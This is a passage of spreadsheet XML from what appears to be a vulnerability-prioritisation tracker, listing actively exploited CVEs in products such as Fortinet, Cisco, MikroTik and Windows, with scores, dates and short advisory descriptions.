      <c r="D8" s="5" t="inlineStr"/>
      <c r="E8" s="5" t="inlineStr"/>
      <c r="F8" s="5" t="inlineStr"/>
      <c r="G8" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H8" s="5" t="n">
        <v>0.024</v>
      </c>
      <c r="I8" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr">
        <is>
          <t>fortinet:multiple products</t>
        </is>
      </c>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr"/>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>Fortinet FortiOS, FortiSwitchManager, and FortiSASE contain a heap-based buffer overflow vulnerability that allows an attacker to execute unauthorized code or commands via specially crafted packets.</t>
        </is>
      </c>
      <c r="S8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-25249</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19490</t>
        </is>
      </c>
      <c r="D9" s="5" t="inlineStr"/>
      <c r="E9" s="5" t="inlineStr"/>
      <c r="F9" s="5" t="inlineStr"/>
      <c r="G9" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H9" s="5" t="n">
        <v>0.056</v>
      </c>
      <c r="I9" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler</t>
        </is>
      </c>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr"/>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R9"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9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19490</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20079</t>
        </is>
      </c>
      <c r="D10" s="5" t="inlineStr"/>
      <c r="E10" s="5" t="inlineStr"/>
      <c r="F10" s="5" t="inlineStr"/>
      <c r="G10" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H10" s="5" t="n">
        <v>0.758</v>
      </c>
      <c r="I10" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr">
        <is>
          <t>cisco:secure firewall management center (fmc) and security cloud control (scc) firewall management</t>
        </is>
      </c>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr"/>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10"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10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20079</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42016</t>
        </is>
      </c>
      <c r="D11" s="5" t="inlineStr"/>
      <c r="E11" s="5" t="inlineStr"/>
      <c r="F11" s="5" t="inlineStr"/>
      <c r="G11" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H11" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I11" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr">
        <is>
          <t>jfrog:artifactory</t>
        </is>
      </c>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr"/>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>JFrog Artifactory contains an incorrect authorization vulnerability that leads to a privilege escalation attack due to a validation check of the token signature/issuer and not the token’s scope.</t>
        </is>
      </c>
      <c r="S11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42016</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42018</t>
        </is>
      </c>
      <c r="D12" s="5" t="inlineStr"/>
      <c r="E12" s="5" t="inlineStr"/>
      <c r="F12" s="5" t="inlineStr"/>
      <c r="G12" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H12" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I12" s="5" t="inlineStr">
        <is>
          <t>none</t>
        </is>
      </c>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr">
        <is>
          <t>jfrog:artifactory</t>
        </is>
      </c>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr"/>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>JFrog Artifactory contains an improper authentication vulnerability that could return an internal anonymous-user token to an unauthenticated caller when anonymous access is disabled, potentially exposing sensitive resources.</t>
        </is>
      </c>
      <c r="S12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42018</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67277</t>
        </is>
      </c>
      <c r="D13" s="5" t="inlineStr"/>
      <c r="E13" s="5" t="inlineStr"/>
      <c r="F13" s="5" t="inlineStr"/>
      <c r="G13" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H13" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I13" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr"/>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS contains a missing authentication for critical function vulnerability which allows kernel memory disclosure and denial of service in the btest service.</t>
        </is>
      </c>
      <c r="S13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67277</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75650</t>
        </is>
      </c>
      <c r="D14" s="5" t="inlineStr"/>
      <c r="E14" s="5" t="inlineStr"/>
      <c r="F14" s="5" t="inlineStr"/>
      <c r="G14" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H14" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I14" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce and magento</t>
        </is>
      </c>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr"/>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce and Magento Open Source contain an improper neutralization of special elements used in a template engine vulnerability that could allow an attacker to execute arbitrary code.</t>
        </is>
      </c>
      <c r="S14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75650</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76460</t>
        </is>
      </c>
      <c r="D15" s="5" t="inlineStr"/>
      <c r="E15" s="5" t="inlineStr"/>
      <c r="F15" s="5" t="inlineStr"/>
      <c r="G15" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr">
        <is>
          <t>cisco:identity services engine</t>
        </is>
      </c>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr"/>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R1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15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76461</t>
        </is>
      </c>
      <c r="D16" s="5" t="inlineStr"/>
      <c r="E16" s="5" t="inlineStr"/>
      <c r="F16" s="5" t="inlineStr"/>
      <c r="G16" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H16" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I16" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr">
        <is>
          <t>cisco:secure email gateway</t>
        </is>
      </c>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr"/>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>Cisco AsyncOS software for Cisco Secure Email Gateway (SEG) contains a SQL injection vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system.</t>
        </is>
      </c>
      <c r="S16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76461</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85706</t>
        </is>
      </c>
      <c r="D17" s="5" t="inlineStr"/>
      <c r="E17" s="5" t="inlineStr"/>
      <c r="F17" s="5" t="inlineStr"/>
      <c r="G17" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H17" s="5" t="n">
        <v>0.12</v>
      </c>
      <c r="I17" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr">
        <is>
          <t>gitlab:community edition and enterprise edition</t>
        </is>
      </c>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr"/>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17"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17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85706</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86060</t>
        </is>
      </c>
      <c r="D18" s="5" t="inlineStr"/>
      <c r="E18" s="5" t="inlineStr"/>
      <c r="F18" s="5" t="inlineStr"/>
      <c r="G18" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H18" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I18" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr"/>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS contains an improper neutralization of argument delimiters in a command vulnerability which allows an attacker to change the trusted RouterOS policy mask, leading to privilege escalation.</t>
        </is>
      </c>
      <c r="S18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86060</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86218</t>
        </is>
      </c>
      <c r="D19" s="5" t="inlineStr"/>
      <c r="E19" s="5" t="inlineStr"/>
      <c r="F19" s="5" t="inlineStr"/>
      <c r="G19" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H19" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I19" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr">
        <is>
          <t>n-able:n-central</t>
        </is>
      </c>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr"/>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>N-able N-central contains a static code injection vulnerability that could allow for pre-authentication remote code execution.</t>
        </is>
      </c>
      <c r="S19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86218</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87886</t>
        </is>
      </c>
      <c r="D20" s="5" t="inlineStr"/>
      <c r="E20" s="5" t="inlineStr"/>
      <c r="F20" s="5" t="inlineStr"/>
      <c r="G20" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr">
        <is>
          <t>acronis:backup</t>
        </is>
      </c>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>KEV</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr"/>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>Acronis Backup plugin for cPanel &amp; WHM and extension for Plesk contains an incorrect default permissions vulnerability that could allow for privilege escalation.</t>
        </is>
      </c>
      <c r="S20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87886</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S20"/>
  <conditionalFormatting sqref="E2:E2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0">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4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CVE-2026-84869</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>7d616e1a-3288-43b1-a0dd-0a65d3e70a49</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>connectwise:screenconnect</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-862</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>A condition in the ScreenConnect client may allow files to be transferred and executed through an active remote session without authorization or Host confirmation in certain circumstances. ScreenConnect servers are not impacted.</t>
        </is>
      </c>
      <c r="S2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84869</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is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-693</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t>
        </is>
      </c>
      <c r="S3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85046</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>google:chrome, google:v8</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>Type confusion in V8 in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85046</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87491</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H5" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>google:chromium v8</t>
        </is>
      </c>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr"/>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-23</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5"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S5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87491</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81963</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H6" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-59</t>
        </is>
      </c>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81963</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85880</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H7" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-908</t>
        </is>
      </c>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85880</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
